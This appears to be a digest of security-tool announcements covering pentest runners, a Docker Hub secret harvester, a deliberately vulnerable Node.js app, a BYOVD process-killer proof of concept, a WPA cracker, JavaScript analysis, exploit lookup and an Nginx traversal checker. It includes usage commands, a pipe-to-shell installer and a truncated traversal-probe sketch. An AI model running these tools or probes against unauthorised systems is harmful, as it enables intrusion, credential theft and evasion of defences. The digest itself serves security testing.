Secator - The Pentester's Swiss Knife

By: Zion3R


secator is a task and workflow runner used for security assessments. It supports dozens of well-known security tools and it is designed to improve productivity for pentesters and security researchers.


Features

  • Curated list of commands

  • Unified input options

  • Unified output schema

  • CLI and library usage

  • Distributed options with Celery

  • From simple tasks to complex workflows

  • Customizable


Supported tools

secator integrates the following tools:

| Name | Description | Category |
| --- | --- | --- |
| httpx | Fast HTTP prober. | http |
| cariddi | Fast crawler and endpoint secrets / api keys / tokens matcher. | http/crawler |
| gau | Offline URL crawler (Alien Vault, The Wayback Machine, Common Crawl, URLScan). | http/crawler |
| gospider | Fast web spider written in Go. | http/crawler |
| katana | Next-generation crawling and spidering framework. | http/crawler |
| dirsearch | Web path discovery. | http/fuzzer |
| feroxbuster | Simple, fast, recursive content discovery tool written in Rust. | http/fuzzer |
| ffuf | Fast web fuzzer written in Go. | http/fuzzer |
| h8mail | Email OSINT and breach hunting tool. | osint |
| dnsx | Fast and multi-purpose DNS toolkit designed for running DNS queries. | recon/dns |
| dnsxbrute | Fast and multi-purpose DNS toolkit designed for running DNS queries (bruteforce mode). | recon/dns |
| subfinder | Fast subdomain finder. | recon/dns |
| fping | Find alive hosts on local networks. | recon/ip |
| mapcidr | Expand CIDR ranges into IPs. | recon/ip |
| naabu | Fast port discovery tool. | recon/port |
| maigret | Hunt for user accounts across many websites. | recon/user |
| gf | A wrapper around grep to avoid typing common patterns. | tagger |
| grype | A vulnerability scanner for container images and filesystems. | vuln/code |
| dalfox | Powerful XSS scanning tool and parameter analyzer. | vuln/http |
| msfconsole | CLI to access and work with the Metasploit Framework. | vuln/http |
| wpscan | WordPress Security Scanner. | vuln/multi |
| nmap | Vulnerability scanner using NSE scripts. | vuln/multi |
| nuclei | Fast and customisable vulnerability scanner based on simple YAML based DSL. | vuln/multi |
| searchsploit | Exploit searcher. | exploit/search |

Feel free to request new tools to be added by opening an issue, but please check that the tool complies with our selection criteria before doing so. If it doesn't but you still want to integrate it into secator, you can plug it in (see the dev guide).

Installation

Installing secator

Pipx
pipx install secator
Pip
pip install secator
Bash
wget -O - https://raw.githubusercontent.com/freelabz/secator/main/scripts/install.sh | sh
Docker
docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator --help
The volume mount -v is necessary to save all secator reports to your host machine, and --net=host is recommended to grant full access to the host network. You can alias this command to make it easier to run:
alias secator="docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator"
Now you can run secator as if it were installed on bare metal:
secator --help
Docker Compose
git clone https://github.com/freelabz/secator
cd secator
docker-compose up -d
docker-compose exec secator secator --help

Note: If you chose the Bash, Docker or Docker Compose installation methods, you can skip the next sections and go straight to Usage.

Installing languages

secator uses external tools, so you might need to install the languages used by those tools if they are not already installed on your system.

We provide utilities to install required languages if you don't manage them externally:

Go
secator install langs go
Ruby
secator install langs ruby

Installing tools

secator does not install any of the external tools it supports by default.

We provide utilities to install or update each supported tool which should work on all systems supporting apt:

All tools
secator install tools
Specific tools
secator install tools <TOOL_NAME>
For instance, to install `httpx`, use:
secator install tools httpx

Please make sure you are using the latest available version of each tool before running secator, or you might run into parsing/formatting issues.

Installing addons

secator ships with a minimal set of dependencies.

There are several addons available for secator:

worker Add support for Celery workers (see [Distributed runs with Celery](https://docs.freelabz.com/in-depth/distributed-runs-with-celery)).
secator install addons worker
google Add support for Google Drive exporter (`-o gdrive`).
secator install addons google
mongodb Add support for MongoDB driver (`-driver mongodb`).
secator install addons mongodb
redis Add support for Redis backend (Celery).
secator install addons redis
dev Add development tools like `coverage` and `flake8` required for running tests.
secator install addons dev
trace Add tracing tools like `memray` and `pyinstrument` required for tracing functions.
secator install addons trace
build Add `hatch` for building and publishing the PyPI package.
secator install addons build

Install CVEs

secator makes remote API calls to https://cve.circl.lu/ to get in-depth information about the CVEs it encounters. We provide a subcommand to download all known CVEs locally so that future lookups are made from disk instead:

secator install cves

Checking installation health

To figure out which languages or tools are installed on your system (along with their version):

secator health

Usage

secator --help


Usage examples

Run a fuzzing task (ffuf):

secator x ffuf http://testphp.vulnweb.com/FUZZ

Run a url crawl workflow:

secator w url_crawl http://testphp.vulnweb.com

Run a host scan:

secator s host mydomain.com

And more... To list all the tasks, workflows, and scans that you can use:

secator x --help
secator w --help
secator s --help

Learn more

To go deeper with secator, check out:

  • Our complete documentation
  • Our getting started tutorial video
  • Our Medium post
  • Follow us on social media: @freelabz on Twitter and @FreeLabz on YouTube



DockerSpy - DockerSpy Searches For Images On Docker Hub And Extracts Sensitive Information Such As Authentication Secrets, Private Keys, And More

By: Zion3R


DockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more.


What is Docker?

Docker is an open-source platform that automates the deployment, scaling, and management of applications using containerization technology. Containers allow developers to package an application and its dependencies into a single, portable unit that can run consistently across various computing environments. Docker simplifies the development and deployment process by ensuring that applications run the same way regardless of where they are deployed.

About Docker Hub

Docker Hub is a cloud-based repository where developers can store, share, and distribute container images. It serves as the largest library of container images, providing access to both official images created by Docker and community-contributed images. Docker Hub enables developers to easily find, download, and deploy pre-built images, facilitating rapid application development and deployment.

Why OSINT on Docker Hub?

Open Source Intelligence (OSINT) on Docker Hub involves using publicly available information to gather insights and data from container images and repositories hosted on Docker Hub. This is particularly important for identifying exposed secrets for several reasons:

  1. Security Audits: By analyzing Docker images, organizations can uncover exposed secrets such as API keys, authentication tokens, and private keys that might have been inadvertently included. This helps in mitigating potential security risks.

  2. Incident Prevention: Proactively searching for exposed secrets in Docker images can prevent security breaches before they happen, protecting sensitive information and maintaining the integrity of applications.

  3. Compliance: Ensuring that container images do not expose secrets is crucial for meeting regulatory and organizational security standards. OSINT helps verify that no sensitive information is unintentionally disclosed.

  4. Vulnerability Assessment: Identifying exposed secrets as part of regular security assessments allows organizations to address these vulnerabilities promptly, reducing the risk of exploitation by malicious actors.

  5. Enhanced Security Posture: Continuously monitoring Docker Hub for exposed secrets strengthens an organization's overall security posture, making it more resilient against potential threats.

Utilizing OSINT on Docker Hub to find exposed secrets enables organizations to enhance their security measures, prevent data breaches, and ensure the confidentiality of sensitive information within their containerized applications.

How DockerSpy Works

DockerSpy obtains information from Docker Hub and uses regular expressions to inspect the content for sensitive information, such as secrets.
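As a rough illustration of that approach, here is a minimal regex-matching sketch. It is not DockerSpy's actual code; the patterns, sample input, and function names are simplified examples of the kind of rules such a tool applies to image content:

# Illustrative sketch of regex-based secret matching, not DockerSpy's internals.
import re

SECRET_PATTERNS = {
    "AWS access key id": re.compile(r"AKIA[0-9A-Z]{16}"),
    "Private key header": re.compile(r"-----BEGIN (?:RSA|EC|OPENSSH) PRIVATE KEY-----"),
    "Generic API key assignment": re.compile(r"(?i)api[_-]?key\s*[:=]\s*['\"][0-9a-z\-_]{16,}['\"]"),
}

def find_secrets(text):
    """Return (label, match) pairs for every pattern found in the given content."""
    hits = []
    for label, pattern in SECRET_PATTERNS.items():
        for match in pattern.finditer(text):
            hits.append((label, match.group(0)))
    return hits

sample = 'ENV API_KEY="abcd1234abcd1234abcd"\nAKIAABCDEFGHIJKLMNOP'
for label, value in find_secrets(sample):
    print(label, "->", value)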

Getting Started

To use DockerSpy, follow these steps:

  1. Installation: Clone the DockerSpy repository and install the required dependencies.
git clone https://github.com/UndeadSec/DockerSpy.git && cd DockerSpy && make
  2. Usage: Run DockerSpy from the terminal.
dockerspy

Custom Configurations

To customize DockerSpy configurations, edit the following files:

  • Regular Expressions
  • Ignored File Extensions

Disclaimer

DockerSpy is intended for educational and research purposes only. Users are responsible for ensuring that their use of this tool complies with applicable laws and regulations.

Contribution

Contributions to DockerSpy are welcome! Feel free to submit issues, feature requests, or pull requests to help improve this tool.

About the Author

DockerSpy is developed and maintained by Alisson Moretto (UndeadSec)

I'm a passionate cyber threat intelligence pro who loves sharing insights and crafting cybersecurity tools.

Consider following me:



Thanks

Special thanks to @akaclandestine



VulnNodeApp - A Vulnerable Node.Js Application

By: Zion3R


A vulnerable application built with Node.js, the Express server, and the EJS template engine. This application is meant for educational purposes only.


Setup

Clone this repository

git clone https://github.com/4auvar/VulnNodeApp.git

Application setup:

  • Install the latest node.js version with npm.
  • Open terminal/command prompt and navigate to the location of downloaded/cloned repository.
  • Run command: npm install

DB setup

  • Install and configure the latest MySQL version and start the MySQL service/daemon
  • Log in to MySQL as the root user and run the SQL script below:
CREATE USER 'vulnnodeapp'@'localhost' IDENTIFIED BY 'password';
create database vuln_node_app_db;
GRANT ALL PRIVILEGES ON vuln_node_app_db.* TO 'vulnnodeapp'@'localhost';
USE vuln_node_app_db;
create table users (id int AUTO_INCREMENT PRIMARY KEY, fullname varchar(255), username varchar(255),password varchar(255), email varchar(255), phone varchar(255), profilepic varchar(255));
insert into users(fullname,username,password,email,phone) values("test1","test1","test1","test1@test.com","976543210");
insert into users(fullname,username,password,email,phone) values("test2","test2","test2","test2@test.com","9887987541");
insert into users(fullname,username,password,email,phone) values("test3","test3","test3","test3@test.com","9876987611");
insert into users(fullname,username,password,email,phone) values("test4","test4","test4","test4@test.com","9123459876");
insert into users(fullname,username,password,email,phone) values("test5","test5","test 5","test5@test.com","7893451230");

Set basic environment variable

  • The user needs to set the environment variables below (an example export snippet follows this list).
    • DATABASE_HOST (E.g: localhost, 127.0.0.1, etc...)
    • DATABASE_NAME (E.g: vuln_node_app_db or DB name you change in above DB script)
    • DATABASE_USER (E.g: vulnnodeapp or user name you change in above DB script)
    • DATABASE_PASS (E.g: password or password you change in above DB script)
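For example, on Linux/macOS these can be exported in the shell before starting the application (the values shown match the defaults from the DB script above):

export DATABASE_HOST=localhost
export DATABASE_NAME=vuln_node_app_db
export DATABASE_USER=vulnnodeapp
export DATABASE_PASS=password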

Start the server

  • Open the command prompt/terminal and navigate to the location of your repository
  • Run command: npm start
  • Access the application at http://localhost:3000

Vulnerability covered

  • SQL Injection
  • Cross Site Scripting (XSS)
  • Insecure Direct Object Reference (IDOR)
  • Command Injection
  • Arbitrary File Retrieval
  • Regular Expression Injection
  • XML External Entity (XXE) Injection
  • Node.js Deserialization
  • Security Misconfiguration
  • Insecure Session Management

TODO

  • Will add new vulnerabilities such as CORS, Template Injection, etc...
  • Improve application documentation

Issues

  • In case of bugs in the application, feel free to create an issue on GitHub.

Contribution

  • Feel free to create a pull request for any contribution.

You can reach me at @4auvar



Reaper - Proof Of Concept On BYOVD Attack

By: Zion3R


Reaper is a proof-of-concept designed to exploit a BYOVD (Bring Your Own Vulnerable Driver) vulnerability. This malicious technique involves inserting a legitimate, vulnerable driver into a target system, which allows attackers to exploit the driver to perform malicious actions.

Reaper was specifically designed to exploit the vulnerability present in the kprocesshacker.sys driver in version 2.8.0.0, taking advantage of its weaknesses to gain privileged access and control over the target system.

Note: Reaper does not kill the Windows Defender process, as it is protected; Reaper is a simple proof of concept.


Features

  • Kill process
  • Suspend process

Help

      ____
/ __ \___ ____ _____ ___ _____
/ /_/ / _ \/ __ `/ __ \/ _ \/ ___/
/ _, _/ __/ /_/ / /_/ / __/ /
/_/ |_|\___/\__,_/ .___/\___/_/
/_/

[Coded by MrEmpy]
[v1.0]

Usage: C:\Windows\Temp\Reaper.exe [OPTIONS] [VALUES]
Options:
sp, suspend process
kp, kill process

Values:
PROCESSID process id to suspend/kill

Examples:
Reaper.exe sp 1337
Reaper.exe kp 1337

Demonstration

Install

You can compile it directly from the source code or download it already compiled. You will need Visual Studio 2022 to compile.

Note: The executable and driver must be in the same directory.



Pyrit - The Famous WPA Precomputed Cracker

By: Zion3R


Pyrit allows you to create massive databases of the pre-computed WPA/WPA2-PSK authentication phase in a space-time trade-off. By using the computational power of multi-core CPUs and other platforms through ATI-Stream, Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world's most used security protocols.

WPA/WPA2-PSK is a subset of IEEE 802.11 WPA/WPA2 that skips the complex task of key distribution and client authentication by assigning every participating party the same pre-shared key. This master key is derived from a password which the administrating user has to pre-configure, e.g. on his laptop and the Access Point. When the laptop creates a connection to the Access Point, a new session key is derived from the master key to encrypt and authenticate subsequent traffic. The "shortcut" of using a single master key instead of per-user keys eases deployment of WPA/WPA2-protected networks for home and small-office use, at the cost of making the protocol vulnerable to brute-force attacks against its key negotiation phase; this ultimately allows the password that protects the network to be revealed. This vulnerability has to be considered exceptionally disastrous, as the protocol allows much of the key derivation to be pre-computed, making simple brute-force attacks even more alluring to the attacker. For more background see this article on the project's blog (outdated).


The author does not encourage or support using Pyrit for the infringement of people's communication privacy. The exploration and realization of the technology discussed here are a purpose of their own; this is documented by the open development, strictly source-code-based distribution and 'copyleft' licensing.

Pyrit is free software - free as in freedom. Everyone can inspect, copy or modify it and share derived work under the GNU General Public License v3+. It compiles and executes on a wide variety of platforms including FreeBSD, MacOS X and Linux as operating systems, and x86-, alpha-, arm-, hppa-, mips-, powerpc-, s390- and sparc-processors.

Attacking WPA/WPA2 by brute force boils down to computing Pairwise Master Keys as fast as possible. Every Pairwise Master Key is 'worth' exactly one megabyte of data getting pushed through PBKDF2-HMAC-SHA1. In turn, computing 10,000 PMKs per second is equivalent to hashing 9.8 gigabytes of data with SHA1 in one second.
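For reference, a single PMK is derived as PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes). A minimal Python illustration of that standard WPA/WPA2-PSK derivation (not Pyrit's optimized CPU/GPU code):

# Standard WPA/WPA2-PSK master-key derivation:
# PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)
import hashlib

def compute_pmk(passphrase: str, ssid: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, dklen=32)

print(compute_pmk("password", "linksys").hex())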

These are examples of how multiple computational nodes can access a single storage server over various ways provided by Pyrit:

  • A single storage (e.g. a MySQL-server)
  • A local network that can access the storage-server directly and provide four computational nodes on various levels with only one node actually accessing the storage server itself.
  • Another, untrusted network can access the storage through Pyrit's RPC-interface and provides three computational nodes, two of which actually access the RPC-interface.

What's new

  • Fixed #479 and #481
  • Pyrit CUDA now compiles in OSX with Toolkit 7.5
  • Added use_CUDA and use_OpenCL in config file
  • Improved cores listing and managing
  • limit_ncpus now disables all CPUs when set to value <= 0
  • Improve CCMP packet identification, thanks to yannayl

See CHANGELOG file for a better description.

How to use

Pyrit compiles and runs fine on Linux, MacOS X and BSD. I don't care about Windows; drop me a line (read: patch) if you make Pyrit work without copying half of GNU ... A guide for installing Pyrit on your system can be found in the wiki. There is also a Tutorial and a reference manual for the commandline-client.

How to participate

You may want to read this wiki-entry if you are interested in porting Pyrit to a new hardware platform. For contributions or bug reports, please submit an issue at https://github.com/JPaulMora/Pyrit/issues.



JAW - A Graph-based Security Analysis Framework For Client-side JavaScript

By: Zion3R

An open-source, prototype implementation of property graphs for JavaScript based on the esprima parser, and the EsTree SpiderMonkey Spec. JAW can be used for analyzing the client-side of web applications and JavaScript-based programs.

This project is licensed under GNU AFFERO GENERAL PUBLIC LICENSE V3.0. See here for more information.

JAW has a Github pages website available at https://soheilkhodayari.github.io/JAW/.

Release Notes:


Overview of JAW

The architecture of the JAW is shown below.

Test Inputs

JAW can be used in two distinct ways:

  1. Arbitrary JavaScript Analysis: Utilize JAW for modeling and analyzing any JavaScript program by specifying the program's file system path.

  2. Web Application Analysis: Analyze a web application by providing a single seed URL.

Data Collection

  • JAW features several JavaScript-enabled web crawlers for collecting web resources at scale.

HPG Construction

  • Use the collected web resources to create a Hybrid Program Graph (HPG), which will be imported into a Neo4j database.

  • Optionally, supply the HPG construction module with a mapping of semantic types to custom JavaScript language tokens, facilitating the categorization of JavaScript functions based on their purpose (e.g., HTTP request functions).

Analysis and Outputs

  • Query the constructed Neo4j graph database for various analyses. JAW offers utility traversals for data flow analysis, control flow analysis, reachability analysis, and pattern matching. These traversals can be used to develop custom security analyses.

  • JAW also includes built-in traversals for detecting client-side CSRF, DOM Clobbering and request hijacking vulnerabilities.

  • The outputs will be stored in the same folder as that of input.

Setup

The installation script relies on the following prerequisites:

  • Latest version of the npm package manager (Node.js)
  • Any stable version of Python 3.x
  • The Python pip package manager

Afterwards, install the necessary dependencies via:

$ ./install.sh

For detailed installation instructions, please see here.

Quick Start

Running the Pipeline

You can run an instance of the pipeline in a background screen via:

$ python3 -m run_pipeline --conf=config.yaml

The CLI provides the following options:

$ python3 -m run_pipeline -h

usage: run_pipeline.py [-h] [--conf FILE] [--site SITE] [--list LIST] [--from FROM] [--to TO]

This script runs the tool pipeline.

optional arguments:
-h, --help show this help message and exit
--conf FILE, -C FILE pipeline configuration file. (default: config.yaml)
--site SITE, -S SITE website to test; overrides config file (default: None)
--list LIST, -L LIST site list to test; overrides config file (default: None)
--from FROM, -F FROM the first entry to consider when a site list is provided; overrides config file (default: -1)
--to TO, -T TO the last entry to consider when a site list is provided; overrides config file (default: -1)

Input Config: JAW expects a .yaml config file as input. See config.yaml for an example.

Hint. The config file specifies different passes (e.g., crawling, static analysis, etc) which can be enabled or disabled for each vulnerability class. This allows running the tool building blocks individually, or in a different order (e.g., crawl all webapps first, then conduct security analysis).

Quick Example

For running a quick example demonstrating how to build a property graph and run Cypher queries over it, do:

$ python3 -m analyses.example.example_analysis --input=$(pwd)/data/test_program/test.js

Crawling and Data Collection

This module collects the data (i.e., JavaScript code and state values of web pages) needed for testing. If you want to test a specific JavaScript file that you already have on your file system, you can skip this step.

JAW has crawlers based on Selenium (JAW-v1), Puppeteer (JAW-v2, v3) and Playwright (JAW-v3). For most up-to-date features, it is recommended to use the Puppeteer- or Playwright-based versions.

Playwright CLI with Foxhound

This web crawler employs foxhound, an instrumented version of Firefox, to perform dynamic taint tracking as it navigates through webpages. To start the crawler, do:

$ cd crawler
$ node crawler-taint.js --seedurl=https://google.com --maxurls=100 --headless=true --foxhoundpath=<optional-foxhound-executable-path>

The foxhoundpath is by default set to the following directory: crawler/foxhound/firefox which contains a binary named firefox.

Note: you need a build of foxhound to use this version. An ubuntu build is included in the JAW-v3 release.

Puppeteer CLI

To start the crawler, do:

$ cd crawler
$ node crawler.js --seedurl=https://google.com --maxurls=100 --browser=chrome --headless=true

See here for more information.

Selenium CLI

To start the crawler, do:

$ cd crawler/hpg_crawler
$ vim docker-compose.yaml # set the websites you want to crawl here and save
$ docker-compose build
$ docker-compose up -d

Please refer to the documentation of the hpg_crawler here for more information.

Graph Construction

HPG Construction CLI

To generate an HPG for a given (set of) JavaScript file(s), do:

$ node engine/cli.js  --lang=js --graphid=graph1 --input=/in/file1.js --input=/in/file2.js --output=$(pwd)/data/out/ --mode=csv

optional arguments:
--lang: language of the input program
--graphid: an identifier for the generated HPG
--input: path of the input program(s)
--output: path of the output HPG, must be i
--mode: determines the output format (csv or graphML)

HPG Import CLI

To import an HPG inside a neo4j graph database (docker instance), do:

$ python3 -m hpg_neo4j.hpg_import --rpath=<path-to-the-folder-of-the-csv-files> --id=<xyz> --nodes=<nodes.csv> --edges=<rels.csv>
$ python3 -m hpg_neo4j.hpg_import -h

usage: hpg_import.py [-h] [--rpath P] [--id I] [--nodes N] [--edges E]

This script imports a CSV of a property graph into a neo4j docker database.

optional arguments:
-h, --help show this help message and exit
--rpath P relative path to the folder containing the graph CSV files inside the `data` directory
--id I an identifier for the graph or docker container
--nodes N the name of the nodes csv file (default: nodes.csv)
--edges E the name of the relations csv file (default: rels.csv)

HPG Construction and Import CLI (v1)

In order to create a hybrid property graph for the output of the hpg_crawler and import it inside a local neo4j instance, you can also do:

$ python3 -m engine.api <path> --js=<program.js> --import=<bool> --hybrid=<bool> --reqs=<requests.out> --evts=<events.out> --cookies=<cookies.pkl> --html=<html_snapshot.html>

Specification of Parameters:

  • <path>: absolute path to the folder containing the program files for analysis (must be under the engine/outputs folder).
  • --js=<program.js>: name of the JavaScript program for analysis (default: js_program.js).
  • --import=<bool>: whether the constructed property graph should be imported to an active neo4j database (default: true).
  • --hybrid=<bool>: whether the hybrid mode is enabled (default: false). This implies that the tester wants to enrich the property graph by inputting files for any of the HTML snapshot, fired events, HTTP requests and cookies, as collected by the JAW crawler.
  • --reqs=<requests.out>: for hybrid mode only, name of the file containing the sequence of observed network requests, pass the string false to exclude (default: request_logs_short.out).
  • --evts=<events.out>: for hybrid mode only, name of the file containing the sequence of fired events, pass the string false to exclude (default: events.out).
  • --cookies=<cookies.pkl>: for hybrid mode only, name of the file containing the cookies, pass the string false to exclude (default: cookies.pkl).
  • --html=<html_snapshot.html>: for hybrid mode only, name of the file containing the DOM tree snapshot, pass the string false to exclude (default: html_rendered.html).

For more information, you can use the help CLI provided with the graph construction API:

$ python3 -m engine.api -h

Security Analysis

The constructed HPG can then be queried using Cypher or the NeoModel ORM.

Running Custom Graph traversals

You should place and run your queries in analyses/<ANALYSIS_NAME>.

Option 1: Using the NeoModel ORM (Deprecated)

You can use the NeoModel ORM to query the HPG. To write a query:

  • (1) Check out the HPG data model and syntax tree.
  • (2) Check out the ORM model for HPGs
  • (3) See the example query file provided; example_query_orm.py in the analyses/example folder.
$ python3 -m analyses.example.example_query_orm  

For more information, please see here.

Option 2: Using Cypher Queries

You can use Cypher to write custom queries. For this:

  • (1) Check out the HPG data model and syntax tree.
  • (2) See the example query file provided; example_query_cypher.py in the analyses/example folder.
$ python3 -m analyses.example.example_query_cypher

For more information, please see here.
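As a rough illustration of issuing a raw Cypher query from Python, the sketch below uses the official neo4j driver; the connection URI, credentials, and the node label/property names are placeholders for this example, not JAW's actual HPG schema:

# Minimal sketch: run a Cypher query against the Neo4j database holding the HPG.
# The URI, credentials, and label/property names are placeholder assumptions;
# adapt them to your instance and to the HPG data model.
from neo4j import GraphDatabase

driver = GraphDatabase.driver("bolt://localhost:7687", auth=("neo4j", "password"))
with driver.session() as session:
    result = session.run(
        "MATCH (n:ASTNode) WHERE n.Type = $type RETURN n.Code AS code LIMIT 25",
        type="CallExpression",
    )
    for record in result:
        print(record["code"])
driver.close()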

Vulnerability Detection

This section describes how to configure and use JAW for vulnerability detection, and how to interpret the output. JAW contains, among others, self-contained queries for detecting client-side CSRF and DOM Clobbering.

Step 1. enable the analysis component for the vulnerability class in the input config.yaml file:

request_hijacking:
enabled: true
# [...]
#
domclobbering:
enabled: false
# [...]

cs_csrf:
enabled: false
# [...]

Step 2. Run an instance of the pipeline with:

$ python3 -m run_pipeline --conf=config.yaml

Hint. You can run multiple instances of the pipeline under different screens:

$ screen -dmS s1 bash -c 'python3 -m run_pipeline --conf=conf1.yaml; exec sh'
$ screen -dmS s2 bash -c 'python3 -m run_pipeline --conf=conf2.yaml; exec sh'
$ # [...]

To generate parallel configuration files automatically, you may use the generate_config.py script.

How to Interpret the Output of the Analysis?

The outputs will be stored in a file called sink.flows.out in the same folder as that of the input. For client-side CSRF, for example, for each detected HTTP request, JAW outputs an entry marking the set of semantic types (a.k.a. semantic tags or labels) associated with the elements constructing the request (i.e., the program slices). For example, an HTTP request marked with the semantic type ['WIN.LOC'] is forgeable through the window.location injection point, whereas a request marked with ['NON-REACH'] is not forgeable.

An example output entry is shown below:

[*] Tags: ['WIN.LOC']
[*] NodeId: {'TopExpression': '86', 'CallExpression': '87', 'Argument': '94'}
[*] Location: 29
[*] Function: ajax
[*] Template: ajaxloc + "/bearer1234/"
[*] Top Expression: $.ajax({ xhrFields: { withCredentials: "true" }, url: ajaxloc + "/bearer1234/" })

1:['WIN.LOC'] variable=ajaxloc
0 (loc:6)- var ajaxloc = window.location.href

This entry shows that on line 29, there is a $.ajax call expression, and this call expression triggers an ajax request with the url template value of ajaxloc + "/bearer1234/", where the parameter ajaxloc is a program slice reading its value at line 6 from window.location.href, thus forgeable through ['WIN.LOC'].

Test Web Application

In order to streamline the testing process for JAW and ensure that your setup is accurate, we provide a simple node.js web application which you can test JAW with.

First, install the dependencies via:

$ cd tests/test-webapp
$ npm install

Then, run the application in a new screen:

$ screen -dmS jawwebapp bash -c 'PORT=6789 npm run devstart; exec sh'

Detailed Documentation.

For more information, visit our wiki page here. Below is a table of contents for quick access.

The Web Crawler of JAW

Data Model of Hybrid Property Graphs (HPGs)

Graph Construction

Graph Traversals

Contribution and Code Of Conduct

Pull requests are always welcomed. This project is intended to be a safe, welcoming space, and contributors are expected to adhere to the contributor code of conduct.

Academic Publication

If you use the JAW for academic research, we encourage you to cite the following paper:

@inproceedings{JAW,
title = {JAW: Studying Client-side CSRF with Hybrid Property Graphs and Declarative Traversals},
author= {Soheil Khodayari and Giancarlo Pellegrino},
booktitle = {30th {USENIX} Security Symposium ({USENIX} Security 21)},
year = {2021},
address = {Vancouver, B.C.},
publisher = {{USENIX} Association},
}

Acknowledgements

JAW has come a long way and we want to give our contributors a well-deserved shoutout here!

@tmbrbr, @c01gide, @jndre, and Sepehr Mirzaei.



SploitScan - A Sophisticated Cybersecurity Utility Designed To Provide Detailed Information On Vulnerabilities And Associated Proof-Of-Concept (PoC) Exploits

By: Zion3R


SploitScan is a powerful and user-friendly tool designed to streamline the process of identifying exploits for known vulnerabilities and their respective exploitation probability. It empowers cybersecurity professionals to swiftly identify, test, and apply known exploits. It's particularly valuable for professionals seeking to enhance their security measures or develop robust detection strategies against emerging threats.


Features
  • CVE Information Retrieval: Fetches CVE details from the National Vulnerability Database.
  • EPSS Integration: Includes Exploit Prediction Scoring System (EPSS) data, offering a probability score for the likelihood of CVE exploitation, aiding in prioritization.
  • PoC Exploits Aggregation: Gathers publicly available PoC exploits, enhancing the understanding of vulnerabilities.
  • CISA KEV: Shows if the CVE has been listed in the Known Exploited Vulnerabilities (KEV) of CISA.
  • Patching Priority System: Evaluates and assigns a priority rating for patching based on various factors including public exploits availability.
  • Multi-CVE Support and Export Options: Supports multiple CVEs in a single run and allows exporting the results to JSON and CSV formats.
  • User-Friendly Interface: Easy to use, providing clear and concise information.
  • Comprehensive Security Tool: Ideal for quick security assessments and staying informed about recent vulnerabilities.

Usage

Regular:

python sploitscan.py CVE-YYYY-NNNNN

Enter one or more CVE IDs to fetch data. Separate multiple CVE IDs with spaces.

python sploitscan.py CVE-YYYY-NNNNN CVE-YYYY-NNNNN

Optional: Export the results to a JSON or CSV file. Specify the format: 'json' or 'csv'.

python sploitscan.py CVE-YYYY-NNNNN -e JSON

Patching Prioritization System

The Patching Prioritization System in SploitScan provides a strategic approach to prioritizing security patches based on the severity and exploitability of vulnerabilities. It's influenced by the model from CVE Prioritizer, with enhancements for handling publicly available exploits. Here's how it works:

  • A+ Priority: Assigned to CVEs listed in CISA's KEV or those with publicly available exploits. This reflects the highest risk and urgency for patching.
  • A to D Priority: Based on a combination of CVSS scores and EPSS probability percentages. The decision matrix is as follows:
  • A: CVSS score >= 6.0 and EPSS score >= 0.2. High severity with a significant probability of exploitation.
  • B: CVSS score >= 6.0 but EPSS score < 0.2. High severity but lower probability of exploitation.
  • C: CVSS score < 6.0 and EPSS score >= 0.2. Lower severity but higher probability of exploitation.
  • D: CVSS score < 6.0 and EPSS score < 0.2. Lower severity and lower probability of exploitation.

This system assists users in making informed decisions on which vulnerabilities to patch first, considering both their potential impact and the likelihood of exploitation. Thresholds can be adjusted to your business needs.
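As a rough illustration, the decision matrix above can be expressed in a few lines of Python. This is a sketch of the rules listed here, not SploitScan's internal code; the function and argument names are hypothetical:

# Sketch of the patching prioritization matrix described above (names are hypothetical).
def patching_priority(cvss, epss, in_cisa_kev=False, public_exploit=False,
                      cvss_threshold=6.0, epss_threshold=0.2):
    """Return a priority rating (A+, A, B, C, D) for a CVE."""
    if in_cisa_kev or public_exploit:
        return "A+"
    if cvss >= cvss_threshold:
        return "A" if epss >= epss_threshold else "B"
    return "C" if epss >= epss_threshold else "D"

print(patching_priority(cvss=9.8, epss=0.5))                    # A
print(patching_priority(cvss=4.3, epss=0.01))                   # D
print(patching_priority(cvss=5.0, epss=0.9, in_cisa_kev=True))  # A+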


Changelog

[17th February 2024] - Enhancement Update
  • Additional Information: Added further information such as references & vector string
  • Removed: Star count in publicly available exploits

[15th January 2024] - Enhancement Update
  • Multiple CVE Support: Now capable of handling multiple CVE IDs in a single execution.
  • JSON and CSV Export: Added functionality to export results to JSON and CSV files.
  • Enhanced CVE Display: Improved visual differentiation and information layout for each CVE.
  • Patching Priority System: Introduced a priority rating system for patching, influenced by various factors including the availability of public exploits.

[13th January 2024] - Initial Release
  • Initial release of SploitScan.

Contributing

Contributions are welcome. Please feel free to fork, modify, and make pull requests or report issues.


Author

Alexander Hagenah - URL - Twitter


Credits


Navgix - A Multi-Threaded Golang Tool That Will Check For Nginx Alias Traversal Vulnerabilities

By: Zion3R


navgix is a multi-threaded Golang tool that checks for Nginx alias traversal vulnerabilities.


Techniques

Currently, navgix supports two techniques for finding vulnerable directories (or location aliases):

Heuristics

navgix will make an initial GET request to the page and, if any directories are referenced in the page HTML (in src attributes of HTML components), it will test each folder in the path for the vulnerability. For example, if it finds a link to /static/img/photos/avatar.png, it will test /static/, /static/img/ and /static/img/photos/.
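A rough Python sketch of this heuristic follows. It is illustrative only, not navgix's Go implementation; the target URL is a placeholder, and the probe uses the classic off-by-slash alias-traversal pattern:

# Illustrative sketch of the heuristic above, not navgix's actual code.
# For each directory prefix found in a src path, probe the classic Nginx
# off-by-slash alias traversal pattern (e.g. /static../) and report the status.
import requests

def candidate_prefixes(path):
    """'/static/img/photos/avatar.png' -> ['/static/', '/static/img/', '/static/img/photos/']"""
    parts = path.strip("/").split("/")[:-1]          # drop the file name
    return ["/" + "/".join(parts[:i + 1]) + "/" for i in range(len(parts))]

def probe(base_url, prefix):
    # '/static/' -> request '/static../', which escapes the aliased directory
    # when the location block lacks a trailing slash.
    traversal = prefix.rstrip("/") + "../"
    r = requests.get(base_url + traversal, allow_redirects=False, timeout=10)
    # A non-404 answer (often 403 or a directory listing) hints at traversal.
    return r.status_code

base = "http://target.example"   # placeholder target
for p in candidate_prefixes("/static/img/photos/avatar.png"):
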